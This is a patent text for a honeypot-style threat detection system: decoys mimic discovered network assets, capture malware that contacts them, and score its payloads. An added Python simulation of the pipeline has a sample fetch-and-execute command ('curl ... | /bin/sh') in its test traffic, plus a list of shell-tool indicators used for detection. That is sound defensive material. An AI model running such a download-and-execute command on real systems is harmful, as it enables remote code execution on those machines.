System and method for cyber threats detection
First Claim
1. A method of detecting a cyber threat, the method comprising:
- automatically discovering real resources on a network, wherein the real resources provide services and wherein the real resources include at least one of: a device and a server;
- faking at least one real resource discovered on the network, wherein faking a resource includes advertising at least one service provided by the faked resource;
- detecting an interaction of malware applications with the faked resource;
- capturing code of the malware applications and storing the code on the faked resource;
- uploading the code to a server;
- analyzing the code, by the server, to produce an analysis result;
- determining, for each of the plurality of payloads, a severity score based on the analysis result;
- providing a report based on the scores; and
- performing at least one action based on the analysis result.
Abstract
A system and method for detecting a cyber-threat according to embodiments of the present invention comprise automatically discovering resources on a network, by a resource detection unit; emulating, by a faked asset creation unit, at least one resource discovered on the network; associating a malware trap sensor with the emulated resource; and detecting, by the malware trap sensor, malware related to the emulated resource. The system and method may further comprise uploading data related to the detected malware to a server, analyzing, by the server, the uploaded data to produce an analysis result, and performing one or more actions based on the analysis result.
18 Claims
Claim 1 is reproduced above; claims 2 to 12 depend on claim 1.
13. A system for cyber threats detection comprising:
- a server comprising a management unit;
- a client network;
- an external network; and
- a computer comprising a user interface unit;
wherein said client network comprises:
- a resource detection unit configured to automatically discover real assets on a network, wherein the real assets provide services and wherein the real assets include at least one of: a device and a server;
- an asset inventory;
- a faked assets creation unit configured to fake at least one real asset discovered on the network, wherein faking an asset includes advertising at least one service provided by the faked asset;
- a plurality of faked assets; and
- a malware trap sensor configured to: detect an interaction of malware applications with a faked asset, and capture code of the malware applications and upload the code to the server;
wherein the server is adapted to: analyze the code to produce an analysis result; determine, for each of the plurality of payloads, a severity score based on the analysis result; provide a report based on the scores; and perform at least one action based on the analysis result.
Claims 14 to 18 depend on claim 13.
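The following is an added example, not code from the patent or its assignee, showing how the pipeline of claims 1 and 13 (discover real assets, create faked assets that advertise the same services, trap interactions with them, analyze the captured payloads on a server, score each payload, report, act) fits together as a single offline simulation. The scan records, decoy address prefix, sample interactions, scoring weights and action thresholds are all constructed assumptions; the analysis is deliberately limited to static features (executable header, byte entropy, shell-command indicators) so it runs without any network access.

```python
"""Added example (not the patent's code): offline simulation of the claimed
deception pipeline. Hosts, ports, thresholds and traffic are constructed."""
from dataclasses import dataclass, field
import hashlib
import math
from typing import Dict, List


@dataclass
class FakedAsset:
    decoy_host: str
    mimics: str                      # real asset this decoy imitates
    advertised_services: List[int]   # same ports the real asset serves on
    captured: List[bytes] = field(default_factory=list)


@dataclass
class Interaction:
    dst_host: str
    dst_port: int
    src_host: str
    payload: bytes


# Constructed stand-in for the resource detection unit's scan output.
SCAN_RECORDS = [("10.0.0.5", 22), ("10.0.0.5", 80), ("10.0.0.9", 445)]


def discover_assets(scan_records) -> Dict[str, List[int]]:
    """Resource detection unit: group (host, open port) records into an inventory."""
    inventory: Dict[str, List[int]] = {}
    for host, port in scan_records:
        inventory.setdefault(host, []).append(port)
    return inventory


def fake_assets(inventory, decoy_prefix="10.0.9.") -> Dict[str, FakedAsset]:
    """Faked asset creation unit: one decoy per real asset, advertising the same services."""
    return {f"{decoy_prefix}{i}": FakedAsset(f"{decoy_prefix}{i}", host, list(ports))
            for i, (host, ports) in enumerate(inventory.items(), start=1)}


class MalwareTrapSensor:
    """Nothing legitimate should talk to a decoy, so every decoy interaction is captured."""
    def __init__(self, decoys: Dict[str, FakedAsset]):
        self.decoys = decoys

    def observe(self, ix: Interaction) -> bool:
        decoy = self.decoys.get(ix.dst_host)
        if decoy is None:
            return False                     # traffic to a real asset: not ours
        decoy.captured.append(ix.payload)    # store the code on the faked resource
        return True


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


SHELL_INDICATORS = (b"/bin/sh", b"powershell", b"cmd.exe", b"wget ", b"curl ")


def analyze(payload: bytes) -> dict:
    """Server-side analysis of one uploaded payload (static features only)."""
    return {
        "sha256": hashlib.sha256(payload).hexdigest(),
        "size": len(payload),
        "entropy": shannon_entropy(payload),
        "executable_header": payload[:4] == b"\x7fELF" or payload[:2] == b"MZ",
        "shell_indicators": [s for s in SHELL_INDICATORS if s in payload],
    }


def severity_score(analysis: dict) -> int:
    score = 10                               # baseline: any decoy contact is unexpected
    if analysis["executable_header"]:
        score += 40
    if analysis["entropy"] > 7.0:            # packed or encrypted-looking content
        score += 30
    if analysis["shell_indicators"]:
        score += 20
    return min(score, 100)


def choose_action(score: int) -> str:
    return "isolate_source" if score >= 70 else "alert" if score >= 30 else "log"


def run_pipeline(scan_records, interactions) -> List[dict]:
    """Full claimed flow; returns the report rows sorted by severity."""
    decoys = fake_assets(discover_assets(scan_records))
    sensor = MalwareTrapSensor(decoys)
    report = []
    for ix in interactions:
        if not sensor.observe(ix):
            continue
        analysis = analyze(ix.payload)       # "upload" to the analysis server
        score = severity_score(analysis)
        report.append({"decoy": ix.dst_host, "mimics": decoys[ix.dst_host].mimics,
                       "source": ix.src_host, "sha256": analysis["sha256"][:16],
                       "score": score, "action": choose_action(score)})
    return sorted(report, key=lambda r: r["score"], reverse=True)


# Constructed traffic: two probes and a dropped binary aimed at decoys, one normal request to a real host.
SAMPLE_INTERACTIONS = [
    Interaction("10.0.9.1", 80, "203.0.113.4", b"GET /login HTTP/1.1\r\nHost: x\r\n\r\n"),
    Interaction("10.0.9.2", 445, "203.0.113.4", b"\x7fELF" + bytes(range(256))),
    Interaction("10.0.9.1", 22, "203.0.113.9", b"curl http://203.0.113.9/x | /bin/sh"),
    Interaction("10.0.0.5", 80, "10.0.0.20", b"GET / HTTP/1.1\r\n\r\n"),
]

if __name__ == "__main__":
    for row in run_pipeline(SCAN_RECORDS, SAMPLE_INTERACTIONS):
        print(row)
```

The decoys are keyed by address so the sensor can tell decoy traffic from real-asset traffic in constant time; in a deployment the same lookup would be driven by the asset inventory the claim names. The baseline score of 10 encodes the deception premise that no benign client has a reason to contact a faked asset, so even a harmless-looking probe is logged.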